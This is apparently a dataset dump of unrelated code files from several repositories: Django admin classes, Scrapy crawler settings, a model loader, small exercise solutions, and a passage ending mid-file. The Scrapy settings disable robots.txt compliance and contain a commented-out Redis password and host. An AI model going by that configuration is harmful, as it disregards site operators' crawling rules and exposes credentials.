\"truncated_metadata\",\n )\n list_display_links = (\"item_id\", \"sequence\")\n prepopulated_fields = {\"slug\": (\"title\",)}\n search_fields = [\n \"title\",\n \"media_url\",\n \"item__project__campaign__title\",\n \"item__project__title\",\n \"item__item_id\",\n ]\n list_filter = (\n \"transcription_status\",\n \"published\",\n \"item__project__topics\",\n AssetCampaignStatusListFilter,\n AssetCampaignListFilter,\n AssetProjectListFilter2,\n \"media_type\",\n )\n actions = (\n publish_action,\n change_status_to_completed,\n change_status_to_in_progress,\n change_status_to_needs_review,\n unpublish_action,\n export_to_csv_action,\n export_to_excel_action,\n )\n autocomplete_fields = (\"item\",)\n ordering = (\"item__item_id\", \"sequence\")\n change_list_template = \"admin/concordia/asset/change_list.html\"\n\n def get_queryset(self, request):\n qs = super().get_queryset(request)\n return qs.select_related(\"item\").order_by(\"item__item_id\", \"sequence\")\n\n def lookup_allowed(self, key, value):\n if key in 
(\"item__project__id__exact\", \"item__project__campaign__id__exact\"):\n return True\n else:\n return super().lookup_allowed(key, value)\n\n def item_id(self, obj):\n return obj.item.item_id\n\n @admin.display(description=\"Media URL\")\n def truncated_media_url(self, obj):\n return format_html(\n '{}',\n urljoin(settings.MEDIA_URL, obj.media_url),\n truncatechars(obj.media_url, 100),\n )\n\n def get_readonly_fields(self, request, obj=None):\n if obj:\n return self.readonly_fields + (\"item\",)\n return self.readonly_fields\n\n def change_view(self, request, object_id, extra_context=None, **kwargs):\n if object_id:\n if extra_context is None:\n extra_context = {}\n extra_context[\"transcriptions\"] = (\n Transcription.objects.filter(asset__pk=object_id)\n .select_related(\"user\", \"reviewed_by\")\n .order_by(\"-pk\")\n )\n return super().change_view(\n request, object_id, extra_context=extra_context, **kwargs\n )\n\n def has_reopen_permission(self, request):\n opts = self.opts\n codename = get_permission_codename(\"reopen\", opts)\n return request.user.has_perm(f\"{opts.app_label}.{codename}\")\n\n\n@admin.register(Tag)\nclass TagAdmin(admin.ModelAdmin):\n list_display = (\"id\", \"value\")\n list_display_links = (\"id\", \"value\")\n list_filter = (TagCampaignStatusListFilter, TagCampaignListFilter)\n\n search_fields = [\"value\"]\n\n actions = (\"export_tags_as_csv\",)\n\n def lookup_allowed(self, key, value):\n if key in [\"userassettagcollection__asset__item__project__campaign__id__exact\"]:\n return True\n return super().lookup_allowed(key, value)\n\n def export_tags_as_csv(self, request, queryset):\n tags = queryset.prefetch_related(\n \"userassettagcollection\", \"userassettagcollection__asset\"\n ).order_by(\"userassettagcollection__asset_id\")\n\n headers, data = flatten_queryset(\n tags,\n field_names=[\n \"value\",\n \"userassettagcollection__created_on\",\n \"userassettagcollection__user_id\",\n \"userassettagcollection__asset_id\",\n \"userassettagcollection__asset__title\",\n \"userassettagcollection__asset__download_url\",\n \"userassettagcollection__asset__resource_url\",\n \"userassettagcollection__asset__item__project__campaign__slug\",\n ],\n extra_verbose_names={\n \"value\": \"tag value\",\n \"userassettagcollection__created_on\": \"user asset tag collection date created\", # noqa: E501\n \"userassettagcollection__user_id\": \"user asset tag collection user_id\",\n \"userassettagcollection__asset_id\": \"asset id\",\n \"userassettagcollection__asset__title\": \"asset title\",\n \"userassettagcollection__asset__download_url\": \"asset download url\",\n \"userassettagcollection__asset__resource_url\": \"asset resource url\",\n \"userassettagcollection__asset__item__project__campaign__slug\": \"campaign slug\", # noqa: E501\n },\n )\n\n return export_to_csv_response(\"tags.csv\", headers, data)\n\n\n@admin.register(UserAssetTagCollection)\nclass UserAssetTagCollectionAdmin(admin.ModelAdmin):\n list_display = (\"id\", \"asset\", \"user\", \"created_on\", \"updated_on\")\n list_display_links = (\"id\", \"asset\")\n date_hierarchy = \"created_on\"\n search_fields = [\"asset__title\", \"asset__campaign__title\", \"asset__project__title\"]\n list_filter = (\n UserAssetTagCollectionCampaignStatusListFilter,\n \"asset__item__project__campaign\",\n \"asset__item__project\",\n \"user__is_staff\",\n )\n\n\n@admin.register(Transcription)\nclass TranscriptionAdmin(admin.ModelAdmin):\n list_display = (\n \"id\",\n \"asset\",\n \"user\",\n \"truncated_text\",\n \"created_on\",\n 
\"updated_on\",\n \"accepted\",\n \"rejected\",\n )\n list_display_links = (\"id\", \"asset\")\n\n list_filter = (\n SubmittedFilter,\n AcceptedFilter,\n RejectedFilter,\n OcrGeneratedFilter,\n OcrOriginatedFilter,\n TranscriptionCampaignStatusListFilter,\n TranscriptionCampaignListFilter,\n TranscriptionProjectListFilter,\n )\n\n search_fields = [\"text\", \"user__username\", \"user__email\"]\n\n readonly_fields = (\n \"asset\",\n \"user\",\n \"created_on\",\n \"updated_on\",\n \"submitted\",\n \"accepted\",\n \"rejected\",\n \"reviewed_by\",\n \"supersedes\",\n \"text\",\n )\n\n EXPORT_FIELDS = (\n \"id\",\n \"asset__id\",\n \"asset__slug\",\n \"user\",\n \"created_on\",\n \"updated_on\",\n \"supersedes\",\n \"submitted\",\n \"accepted\",\n \"rejected\",\n \"reviewed_by\",\n \"text\",\n \"ocr_generated\",\n \"ocr_originated\",\n )\n\n def lookup_allowed(self, key, value):\n if key in (\"asset__item__project__campaign__id__exact\"):\n return True\n else:\n return super().lookup_allowed(key, value)\n\n @admin.display(description=\"Text\")\n def truncated_text(self, obj):\n return truncatechars(obj.text, 100)\n\n def export_to_csv(self, request, queryset):\n return export_to_csv_action(\n self, request, queryset, field_names=self.EXPORT_FIELDS\n )\n\n def export_to_excel(self, request, queryset):\n return export_to_excel_action(\n self, request, queryset, field_names=self.EXPORT_FIELDS\n )\n\n actions = (export_to_csv, export_to_excel)\n\n\n@admin.register(SimpleContentBlock)\nclass SimpleContentBlockAdmin(admin.ModelAdmin):\n form = SimpleContentBlockAdminForm\n\n list_display = (\"slug\", \"created_on\", \"updated_on\")\n readonly_fields = (\"created_on\", \"updated_on\")\n\n fieldsets = (\n (None, {\"fields\": (\"created_on\", \"updated_on\", \"slug\")}),\n (\"Body\", {\"classes\": (\"markdown-preview\",), \"fields\": (\"body\",)}),\n )\n\n\n@admin.register(CarouselSlide)\nclass CarouselSlideAdmin(admin.ModelAdmin):\n list_display = (\"headline\", \"published\", \"ordering\")\n readonly_fields = (\"created_on\", \"updated_on\")\n\n\n@admin.register(SimplePage)\nclass SimplePageAdmin(admin.ModelAdmin):\n list_display = (\"path\", \"title\", \"created_on\", \"updated_on\")\n readonly_fields = (\"created_on\", \"updated_on\")\n\n fieldsets = (\n (None, {\"fields\": (\"created_on\", \"updated_on\", \"path\", \"title\")}),\n (\"Body\", {\"classes\": (\"markdown-preview\",), \"fields\": (\"body\",)}),\n )\n\n\n@admin.register(SiteReport)\nclass SiteReportAdmin(admin.ModelAdmin):\n list_display = (\"created_on\", \"report_name\", \"campaign\", \"topic\")\n\n list_filter = (\n \"report_name\",\n SiteReportSortedCampaignListFilter,\n SiteReportCampaignListFilter,\n \"topic\",\n )\n\n def export_to_csv(self, request, queryset):\n return export_to_csv_action(\n self, request, queryset, field_names=SiteReport.DEFAULT_EXPORT_FIELDNAMES\n )\n\n def export_to_excel(self, request, queryset):\n return export_to_excel_action(\n self, request, queryset, field_names=SiteReport.DEFAULT_EXPORT_FIELDNAMES\n )\n\n actions = (export_to_csv, export_to_excel)\n\n FIELDNAME_SORT_KEYS = [\n \"created\",\n \"user\",\n \"campaign\",\n \"topic\",\n \"project\",\n \"item\",\n \"asset\",\n \"transcription\",\n \"tag\",\n ]\n\n def fieldname_sort_key(self, key):\n for i, prefix in enumerate(self.FIELDNAME_SORT_KEYS):\n if prefix in key:\n return (i, key)\n else:\n return (1024, key)\n\n\n@admin.register(UserProfileActivity)\nclass UserProfileActivityAdmin(admin.ModelAdmin):\n list_display = (\n \"id\",\n \"user\",\n 
\"campaign\",\n \"get_status\",\n \"transcribe_count\",\n \"review_count\",\n )\n list_filter = (\n UserProfileActivityCampaignStatusListFilter,\n UserProfileActivityCampaignListFilter,\n )\n raw_id_fields = [\"user\", \"campaign\"]\n read_only_fields = (\n \"user\",\n \"campaign\",\n \"asset_count\",\n \"asset_tag_count\",\n \"transcribe_count\",\n \"review_count\",\n )\n search_fields = [\n \"user__username\",\n ]\n\n\n@admin.register(CampaignRetirementProgress)\nclass CampaignRetirementProgressAdmin(admin.ModelAdmin):\n list_display = (\"campaign\", \"started_on\", \"complete\", \"completed_on\")\n readonly_fields = (\n \"campaign\",\n \"completion\",\n \"projects_removed\",\n \"project_total\",\n \"items_removed\",\n \"item_total\",\n \"assets_removed\",\n \"asset_total\",\n \"complete\",\n \"started_on\",\n \"completed_on\",\n \"removal_log\",\n )\n fieldsets = (\n (\n None,\n {\n \"fields\": (\n \"campaign\",\n \"completion\",\n \"projects_removed\",\n \"project_total\",\n \"items_removed\",\n \"item_total\",\n \"assets_removed\",\n \"asset_total\",\n \"complete\",\n \"started_on\",\n \"completed_on\",\n ),\n },\n ),\n (\n \"Log\",\n {\n \"fields\": (\"removal_log\",),\n \"classes\": (\"collapse\",),\n },\n ),\n )\n\n @admin.display(description=\"Completion percentage\")\n def completion(self, obj):\n if obj.complete:\n return \"100%\"\n total = obj.project_total + obj.item_total + obj.asset_total\n removed = obj.projects_removed + obj.items_removed + obj.assets_removed\n return \"{}%\".format(round(removed / total * 100, 2))\n","repo_name":"LibraryOfCongress/concordia","sub_path":"concordia/admin/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":29137,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"52"} +{"seq_id":"23223067187","text":"# -*- coding: utf-8 -*-\nfrom django.contrib import admin\nfrom django.contrib.postgres import fields as pgfields\n\nfrom jsoneditor.forms import JSONEditor\n\nfrom training.utils.admin import CustomBaseAdmin\nfrom .models import TrainingSpace, PhysicalSpace, VirtualSpace, TrainingSpaceResource\n\n\n# Inline Classes\n# -------------------------------------------------------\nclass TrainingSpaceResourceInlineAdmin(admin.StackedInline):\n model = TrainingSpaceResource\n extra = 0\n fields = ['type', 'extra_data']\n\n formfield_overrides = {pgfields.JSONField: {\"widget\": JSONEditor}}\n\n\n# Admin classes\n# -------------------------------------------------------\nclass PhysicalSpaceAdmin(CustomBaseAdmin):\n list_display = ['id', 'name', 'type', 'location']\n list_display_links = ['id', 'name']\n\n inlines = [TrainingSpaceResourceInlineAdmin]\n\n def formfield_for_choice_field(self, db_field, request, **kwargs):\n if db_field.name == \"type\":\n kwargs[\"choices\"] = (('', '---------'),) + TrainingSpace.Type.PHYSICAL_CHOICES\n return super().formfield_for_choice_field(db_field, request, **kwargs)\n\n\nclass VirtualSpaceAdmin(CustomBaseAdmin):\n list_display = ['id', 'name', 'type']\n list_display_links = ['id', 'name']\n\n def formfield_for_choice_field(self, db_field, request, **kwargs):\n if db_field.name == \"type\":\n kwargs[\"choices\"] = TrainingSpace.Type.VIRTUAL_CHOICES\n return super().formfield_for_choice_field(db_field, request, **kwargs)\n\n\nadmin.site.register(PhysicalSpace, PhysicalSpaceAdmin)\nadmin.site.register(VirtualSpace, 
VirtualSpaceAdmin)\n","repo_name":"hmachuca22/agglad","sub_path":"training/spaces/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24656428309","text":"# Scrapy settings for product project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/topics/settings.html\n#\nSPIDER_MODULES = ['car.spiders']\nNEWSPIDER_MODULE = 'car.spiders'\n\n# Obey robots.txt rules\nROBOTSTXT_OBEY = False\n\nCONCURRENT_REQUESTS_PER_DOMAIN = 10\nCONCURRENT_REQUESTS = 10\n\n#USER_AGENT = 'scrapy-redis (+https://github.com/rolando/scrapy-redis)'\n\nREDIS_START_URLS_AS_SET = True\n\nDUPEFILTER_CLASS = \"scrapy_redis.dupefilter.RFPDupeFilter\"\nSCHEDULER = \"scrapy_redis.scheduler.Scheduler\"\nSCHEDULER_PERSIST = True\n#SCHEDULER_QUEUE_CLASS = \"scrapy_redis.queue.SpiderPriorityQueue\"\n#SCHEDULER_QUEUE_CLASS = \"scrapy_redis.queue.SpiderQueue\"\n#SCHEDULER_QUEUE_CLASS = \"scrapy_redis.queue.SpiderStack\"\n\nITEM_PIPELINES = {\n 'scrapy_redis.pipelines.RedisPipeline': 300,\n}\n\nLOG_LEVEL = 'DEBUG'\n\n# Introduce an artifical delay to make use of parallelism. to speed up the crawl.\nDOWNLOAD_DELAY = 4\n\nDOWNLOAD_TIMEOUT = 8\n\n# DOWNLOADER_MIDDLEWARES = {\n# 'scrapy.contrib.downloadermiddleware.useragent.UserAgentMiddleware' : None,\n# 'product.rotate_useragent.RotateUserAgentMiddleware' :400,\n# 'scrapy.contrib.downloadermiddleware.retry.RetryMiddleware': None,\n# 'product.rotate_retry.RotateRetryMiddleware' :500\n# }\n\n# Retry many times since proxies often fail\nRETRY_TIMES = 3\n# Retry on most error codes since proxies fail for different reasons\nRETRY_HTTP_CODES = [500, 502, 503, 504, 400, 403, 404, 408, 520]\n\n# SPIDER_MIDDLEWARES = {\n# 'scrapy.contrib.spidermiddleware.referer.RefererMiddleware': True,\n# }\n\n# disable cookies\nCOOKIES_ENABLED = False\nCOOKIES_ENABLES = False\n\n# redis params\nIP_POOL_KEY = '%(name)s:ip_pool'\nREDIS_PARAMS = {\n 'socket_timeout': 30,\n 'socket_connect_timeout': 30,\n 'retry_on_timeout': True,\n 'encoding': 'utf-8',\n #'db': 1,\n # 'password': \"mypasshahayou\",\n # 'host': \"192.168.200.116\",\n 'port': \"6379\",\n}","repo_name":"t1m0thyZhang/autohome","sub_path":"car/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"18791421218","text":"r\"\"\"\nFalcon REST server builder for Eka.\n\"\"\"\n\n# Meta\n__plugin_name__ = 'rest.server.falcon'\n__keywords__ = 'Falcon REST server'\n__author__ = 'Viswanath Chidambaram'\n__email__ = 'viswanc@thoughtworks.com'\n__version__ = '0.0.1'\n\n# Imports\nfrom eka.plugins import define, getPluginClass\nCrudApp = getPluginClass('crud.app')\n\n# Data\nbuilderClass = 'python.crud.app'\n\n# Plugin\n@define(__plugin_name__)\nclass Falcon(CrudApp):\n def __init__(self, Structure, Scopes):\n CrudApp.__init__(self, Structure, Scopes)\n\n def build(self):\n from os.path import dirname\n from eka.classes.builders.jinja import jinjaBuilder\n\n Structure = self.Structure\n buildTgt = Structure['buildBase']\n buildSrc = '%s/res' % dirname(__file__)\n builtPath = jinjaBuilder().build(buildSrc, buildTgt, Structure)\n\n # Build the CRUD App\n Structure['buildBase'] = '%s/src/crud' % builtPath\n getPluginClass(builderClass)(self.Structure, self.Scopes).build()\n 
Structure['buildBase'] = buildTgt\n\n return builtPath\n","repo_name":"viswanc/eka-builder-falcon","sub_path":"ekaPyRESTFalcon/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70212835045","text":"import sys\r\nfrom itertools import permutations\r\n\r\n\r\ndef main():\r\n N, M = map(int, input().split())\r\n seq = list(map(int, input().split()))\r\n seq.sort()\r\n checked: set[int] = set()\r\n for C in permutations(seq, M):\r\n if C not in checked:\r\n print(*C)\r\n checked.add(C)\r\n\r\n\r\nif __name__ == '__main__':\r\n input = sys.stdin.readline\r\n main()\r\n","repo_name":"SeungWoo-You/PS","sub_path":"백준/Silver/15663. N과 M (9)/N과 M (9).py","file_name":"N과 M (9).py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39260333491","text":"from typing import List, Optional, Union\n\nimport torch\n\nfrom run_gpt.helper import _DEFAULT_FP16_DTYPE, get_device_map\nfrom run_gpt.logs import logger\n\n\ndef load_model_and_tokenizer(\n model_name_or_path: str,\n tokenizer_name_or_path: Optional[str] = None,\n device: Optional[str] = None,\n precision: Optional[str] = None,\n dtype: Optional[torch.dtype] = None,\n device_map: Optional[Union[str, List[int]]] = None,\n use_fast: bool = False,\n **kwargs,\n):\n \"\"\"Load a model and tokenizer from HuggingFace.\"\"\"\n from transformers import AutoModelForCausalLM, AutoTokenizer\n\n logger.info(\n f'Loading tokenizer from {tokenizer_name_or_path or model_name_or_path} ...'\n )\n tokenizer = AutoTokenizer.from_pretrained(\n tokenizer_name_or_path or model_name_or_path,\n trust_remote_code=True,\n # use_fast=use_fast,\n )\n\n if tokenizer.pad_token is None:\n # Issue: GPT models don't have a pad token\n tokenizer.pad_token = tokenizer.unk_token\n tokenizer.pad_token_id = tokenizer.unk_token_id\n\n # For generation padding tokens should be on the left\n tokenizer.padding_side = \"left\"\n\n logger.info(f\"Loading {model_name_or_path} with precision {precision} ...\")\n\n quantization_config = None\n if precision == 'bit8':\n from transformers import BitsAndBytesConfig\n\n quantization_config = BitsAndBytesConfig(\n load_in_8bit=True,\n llm_int8_enable_fp32_cpu_offload=True,\n llm_int8_skip_modules=[\"lm_head\"],\n )\n elif precision == 'bit4':\n from packaging import version\n\n from run_gpt import importlib_metadata\n\n trf_version = importlib_metadata.version(\"transformers\")\n if 'dev' in trf_version:\n trf_version = '.'.join(trf_version.split('.')[:-1])\n supports_kbit = version.parse(trf_version) >= version.parse(\"4.30.0\")\n assert supports_kbit, (\n f\"4-bit quantization requires transformers >= v4.30.0, you have transformers=={trf_version}.\\n\"\n f\"You can install the latest transformers with `pip install git+https://github.com/huggingface/transformers`.\"\n )\n\n from transformers import BitsAndBytesConfig\n\n quantization_config = BitsAndBytesConfig(\n load_in_4bit=True,\n bnb_4bit_compute_dtype=_DEFAULT_FP16_DTYPE,\n bnb_4bit_use_double_quant=True,\n bnb_4bit_quant_type='nf4',\n )\n\n model = AutoModelForCausalLM.from_pretrained(\n model_name_or_path,\n torch_dtype=dtype or torch.float16,\n quantization_config=quantization_config,\n device_map=device_map or get_device_map(device),\n # split large weight files into smaller ones and use the disk as temporary storage. 
This is useful for\n # loading large models on machines with low RAM.\n low_cpu_mem_usage=True,\n trust_remote_code=True,\n )\n\n return model, tokenizer\n","repo_name":"jina-ai/rungpt","sub_path":"run_gpt/models/loading.py","file_name":"loading.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"52"} +{"seq_id":"72581423526","text":"# Author: Jaap Kanbier\r\n# Student number: s1100592\r\n# Assignment: Caesar cipher - https://dodona.ugent.be/en/exercises/105361566/\r\n\r\n# first input is the amount or the ROT, so 4 means ROT4 encryption\r\n# the secondary input is the actual data that was encoded using this key\r\n# the output is the decrypted value based of the ROT key\r\n\r\nif __name__ == '__main__':\r\n # import both the upper and lowercase alphabetical characters\r\n from string import ascii_lowercase as lc, ascii_uppercase as uc\r\n\r\n # take user input and convert the ROT key to an integer\r\n rot_key = int(input(\"What is the ROT value: \"))\r\n rot_string = input(\"Which string do you want to decrypt? \")\r\n\r\n # turn the encryption around since we need to translate it back\r\n rot_key = abs(rot_key - 26)\r\n\r\n # build a translation using slicing based of the key\r\n rot_table = str.maketrans(lc + uc, lc[rot_key:] + lc[:rot_key] + uc[rot_key:] + uc[:rot_key])\r\n\r\n # display the translation of the string based of the table\r\n print(rot_string.translate(rot_table))","repo_name":"balancedpath/ISCRIP","sub_path":"week3/caesar_cipher.py","file_name":"caesar_cipher.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4391006557","text":"#!/usr/bin/env python\n\nimport asyncio\nimport websockets\n\nasync def remote_start(ws):\n idtag_remote = await ws.recv()\n print(\"< {}\".format(idtag_remote))\n \nasync def main(): \n\n async with websockets.connect(\n 'ws://localhost:9000/CP_1', \n subprotocols=['ocpp1.6']\n ) as ws:\n\n await asyncio.gather(\n remote_start(ws)\n )\n\nif __name__ == '__main__':\n try:\n # asyncio.run() is used when running this example with Python 3.7 and\n # higher.\n asyncio.run(main())\n except AttributeError:\n # For Python 3.6 a bit more code is required to run the main() task on\n # an event loop.\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n loop.close()\n","repo_name":"diegogonzalezmaneyro/car-charge-handler","sub_path":"charge_point/testing/websocket_client.py","file_name":"websocket_client.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"70519476645","text":"from __future__ import annotations\nfrom copy import deepcopy\nimport re\nfrom impacts_model.impacts import (\n EnvironmentalImpact,\n ImpactCategory,\n ImpactSourceId,\n ImpactSourceImpact,\n ImpactValue,\n merge_env_impact,\n)\nfrom pint import Unit\nimport yaml\nfrom impacts_model.quantities.quantities import (\n deserialize_quantity,\n deserialize_unit,\n)\nfrom marshmallow import Schema, fields\n\n\nclass ImpactSource:\n \"\"\"\n A source of environmental impact\n \"\"\"\n\n def __init__(\n self,\n id: ImpactSourceId,\n name: str,\n unit: str | Unit,\n environmental_impact: EnvironmentalImpact,\n uses=[],\n source: str = \"\",\n methodology: str = \"\",\n ) -> None:\n\n self.id = id\n self.name = name\n self._own_impact = environmental_impact\n self.uses = uses if uses is 
not None else []\n self.unit = deserialize_unit(unit)\n\n self.source = source\n self.methodology = methodology\n\n # Set as impact per ImpactSource unit\n for impact in self._own_impact:\n self._own_impact[impact].divide_by(self.unit)\n\n def get_impact(self) -> ImpactSourceImpact:\n \"\"\"\n Return this impact source impact for one unit\n \"\"\"\n sub_impacts = self._get_sub_impacts()\n # total = self._get_total(sub_impacts)\n return ImpactSourceImpact(self.id, deepcopy(self._own_impact), sub_impacts)\n\n def _get_total(\n self, sub_impacts: dict[ImpactSourceId, ImpactSourceImpact]\n ) -> EnvironmentalImpact:\n \"\"\"\n Return this ImpactSource EnvironmentalImpact, as the sum of its sub impact sources and own impact\n \"\"\"\n # The result will always add this ImpactSource own impact\n total = deepcopy(self._own_impact)\n # Iterate though sub_impacts to sum them into the result\n for sub_impact in sub_impacts:\n total = merge_env_impact(total, sub_impacts[sub_impact].total_impact)\n return total\n\n def _get_sub_impacts(self) -> dict[ImpactSourceId, ImpactSourceImpact]:\n \"\"\"\n Return a list of ImpactSourceImpact, for all the sub_impacts of this ImpactSource\n \"\"\"\n result: dict[ImpactSourceId, ImpactSourceImpact] = {}\n\n # Iterate through impact source used\n for use in self.uses:\n # deserialize the impact source and amount\n impact_source = impact_source_factory(use[\"resource_id\"])\n amount = deserialize_quantity(use[\"quantity\"])\n\n if amount:\n impact = impact_source.get_impact()\n # Compute the other resource quantity consumed to remove its unit\n impact.multiply_by(amount)\n # Set as quantity per this ImpactSource unit\n impact.divide_by(self.unit)\n # Add to sub impacts list\n if impact_source.id in result:\n result[impact_source.id].add(impact)\n else:\n result[impact_source.id] = impact\n return result\n\n @property\n def has_time_input(self) -> bool:\n units_split = re.split(r\"[*,/]\", str(self.unit))\n units_split_len = len(units_split)\n if units_split_len < 2:\n return False\n else:\n return deserialize_quantity(1 * units_split[0]).check(\n \"[time]\"\n ) or deserialize_quantity(1 * units_split[1]).check(\"[time]\")\n\n\nclass ImpactSourceSchema(Schema):\n id = fields.Str()\n name = fields.Str()\n unit = fields.Str()\n source = fields.Str(\n allow_none=True,\n )\n methodology = fields.Str(\n allow_none=True,\n )\n\n\ndef _get_all_impact_sources() -> list[ImpactSource]:\n def impact_source_constructor(loader, node):\n fields = loader.construct_mapping(node, deep=True)\n return ImpactSource(**fields)\n\n def impact_value_constructor(loader, node) -> ImpactValue:\n fields = loader.construct_mapping(node, deep=True)\n return ImpactValue(**fields)\n\n def environmental_impact_constructor(loader, node) -> EnvironmentalImpact:\n \"\"\"\n Useful to translate readable yaml categories to ImpactCategory\n Ex: climate_change to kg_co2\n \"\"\"\n fields = loader.construct_mapping(node, deep=True)\n climate_change = fields[\"climate_change\"]\n resource_depletion = fields[\"resource_depletion\"]\n acidification = fields[\"acidification\"]\n fine_particles = fields[\"fine_particles\"]\n ionizing_radiations = fields[\"ionizing_radiations\"]\n water_depletion = fields[\"water_depletion\"]\n raw_materials = fields[\"raw_materials\"]\n return {\n ImpactCategory.CLIMATE_CHANGE: climate_change\n if climate_change is not None\n else ImpactValue(),\n ImpactCategory.RESOURCE_DEPLETION: resource_depletion\n if resource_depletion is not None\n else ImpactValue(),\n 
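# categories missing from the yaml fall back to an empty ImpactValue\n            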
ImpactCategory.ACIDIFICATION: acidification\n            if acidification is not None\n            else ImpactValue(),\n            ImpactCategory.FINE_PARTICLES: fine_particles\n            if fine_particles is not None\n            else ImpactValue(),\n            ImpactCategory.IONIZING_RADIATIONS: ionizing_radiations\n            if ionizing_radiations is not None\n            else ImpactValue(),\n            ImpactCategory.WATER_DEPLETION: water_depletion\n            if water_depletion is not None\n            else ImpactValue(),\n            ImpactCategory.RAW_MATERIALS: raw_materials\n            if raw_materials is not None\n            else ImpactValue(),\n        }\n\n    yaml.add_constructor(\"!ImpactSource\", impact_source_constructor)\n    yaml.add_constructor(\"!ImpactValue\", impact_value_constructor)\n    yaml.add_constructor(\"!EnvironmentalImpact\", environmental_impact_constructor)\n\n    sources = []\n    with open(\"impacts_model/data/impact_sources/default.yaml\", \"r\") as stream:\n        data_loaded = yaml.load_all(stream, Loader=yaml.Loader)\n        for data in data_loaded:\n            sources.append(data)\n    return sources\n\n\nimpact_sources = _get_all_impact_sources()\n\n\nclass ImpactSourceError(Exception):\n    pass\n\n\ndef impact_source_factory(id: str) -> ImpactSource:\n    \"\"\"\n    Factory function to create an ImpactSource object from its id\n    :param id: id of the ImpactSource to create\n    :return: an ImpactSource object\n    \"\"\"\n    res = next((x for x in impact_sources if x.id == id), None)\n    if res is None:\n        raise ImpactSourceError(\"No corresponding impact source: \" + id)\n    return res\n","repo_name":"Orange-OpenSource/SoftwareLifecycleEnvImpact","sub_path":"back/impacts_model/impact_sources.py","file_name":"impact_sources.py","file_ext":"py","file_size_in_byte":6593,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"}
+{"seq_id":"6627251977","text":"# Exception catching\ntry:\n    #int('abc')\n    #sum = 1 + '1'\n    #f = open('aaa.txt')\n    #print(f.read())\n    #f.close()\n    num = 1\nexcept OSError as reason:\n    print('File error! The reason is: ' + str(reason))\nexcept TypeError as reason:\n    print('Type error! The reason is: ' + str(reason))\n\n#except (OSError,TypeError): # can catch both of these exception types at once\n#    print(\"Something went wrong\")\n\nexcept:\n    print(\"Something went wrong\")\n\n\n\ntry:\n    f = open('bbb.txt', 'w')\n    print(f.write(\"Now I exist\"))\n    sum = 1 + '1'\nexcept (OSError,TypeError):\n    print('Something went wrong')\nfinally:\n    f.close()\n\n\n# raise an exception yourself\nraise ZeroDivisionError('divisor-is-zero exception')\n\n\n","repo_name":"Tlwhisper/yympyLevel0110","sub_path":"01_xiao_jia_yu/034_try.py","file_name":"034_try.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"37621136258","text":"# Definition for singly-linked list.\nclass ListNode:\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\nclass Solution:\n    def isPalindrome(self, head):\n        \"\"\"\n        :type head: ListNode\n        :rtype: bool\n        \"\"\"\n        # To check a palindrome, compare the first half with the second half: push the first half onto a stack, then pop and compare against the second half one node at a time.\n        fast = slow = head\n        stack = []\n\n        while fast and fast.next:\n            stack.append(slow.val)\n            slow = slow.next\n            fast = fast.next.next\n\n        if fast:\n            slow = slow.next\n\n        while slow:\n            top = stack.pop()\n\n            if top != slow.val:\n                return False\n            slow = slow.next\n        return True\n\nclass Solution2:\n    def isPalindrome(self, head):\n        \"\"\"\n        :type head: ListNode\n        :rtype: bool\n        \"\"\"\n        if not head or not head.next:\n            return True\n        slow = fast = head\n        while fast.next and fast.next.next:\n            slow = slow.next\n            fast = fast.next.next\n\n        slow = slow.next\n        slow = self.reverseList(slow)\n\n        while slow:\n            if head.val != slow.val:\n                return False\n            slow = slow.next\n            head = head.next\n        return 
True\n\n def reverseList(self, head):\n new_head = None\n while head:\n p = head\n head = head.next\n p.next = new_head\n new_head = p\n return new_head\n\n\nif __name__ == '__main__':\n head = ListNode(1)\n head.next = ListNode(2)\n head.next.next = ListNode(2)\n head.next.next.next = ListNode(1)\n print(Solution().isPalindrome(head))\n\n\n\n\n\n\n \"\"\"\n Time Complexity = O(N)\n Space Complexity = O(n/2)\n\n Given a singly linked list, determine if it is a palindrome.\n\n Example:\n Input: 1->2->2->1\n Output: true\n \"\"\"\n","repo_name":"yz5308/Python_Leetcode","sub_path":"Algorithm-Easy/234_Palindrome_Linked_List.py","file_name":"234_Palindrome_Linked_List.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5196398118","text":"import time\nfrom config import *\nfrom kamcordutils import *\nfrom messages import MessageManager\n\nUSERNAME_INDEX = 0\nMESSAGE_INDEX = 1\n\ndef compareMessages( firstMessage, secondMessage ):\n return firstMessage[ USERNAME_INDEX ] == secondMessage[ USERNAME_INDEX ] and firstMessage[ MESSAGE_INDEX ] == secondMessage[ MESSAGE_INDEX ]\n\nclass DazBot( object ):\n def __init__( self, streamUrl ):\n \n #Create the driver\n self.driver = webdriver.Firefox()\n self.driver.get( streamUrl )\n \n #Give the driver a chance to connect\n time.sleep( 2 )\n \n self.authUsers = []\n self.commands = {}\n \n self.messageManager = MessageManager( getMessages( self.driver ) )\n self.messageLog = []\n self.lastMessageScrape = [] \n \n def addAuthorizedUser( self, username ):\n if username 